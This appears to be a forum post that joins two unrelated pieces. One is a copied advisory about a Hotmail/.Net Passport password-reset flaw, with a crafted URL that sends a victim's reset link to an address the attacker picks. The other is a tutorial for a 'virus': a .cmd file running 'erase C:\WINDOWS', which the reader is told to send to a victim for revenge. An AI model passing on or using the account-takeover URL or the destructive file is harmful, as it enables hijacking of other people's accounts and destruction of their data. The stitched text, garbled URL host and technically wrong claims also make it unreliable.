me-here1405241520

is it working now...?

An attacker can reset any Microsoft Hotmail/.Net Passport user accountwith no prior information like state, zip, country, answer to the secret
question and the old password. Normally, a user has to answer the
security questions and than answer the secret question if he wants to
reset his password. By exploiting this vulnerability, an attacker can
submit a specially crafted URL to get the password reset instructions
and reset any user?s password.

TECHNICAL DETAILS

Due to the nature of this vulnerability and the fact that there is no
fix available yet, no technical details are being made available with
this advisory. Full technical details will be made available on our
website once the vulnerability is fixed by Microsoft. Please note that
we were forced to release this information public as these
vulnerabilities are actively being exploited in the wild and are one of
the most severe vulnerabilities ever found in Microsoft Hotmail/.Net
Passport.


The flaw is exploited by opening the following URL in a web browser:

http://forums.xisto.com/no_longer_exists/
&em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst=

after that, URL which resets the password will be delivered, in this case, to where-to@send-the-email.com.

The only thing you need is Notepad .

Now, to test it, create a textfile called TEST.txt(empty) in C:\

Now in your notepad type "erase C:\TEST.txt" (without the quotes).

Then do "Save As..." and save it as "Test.cmd".

Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.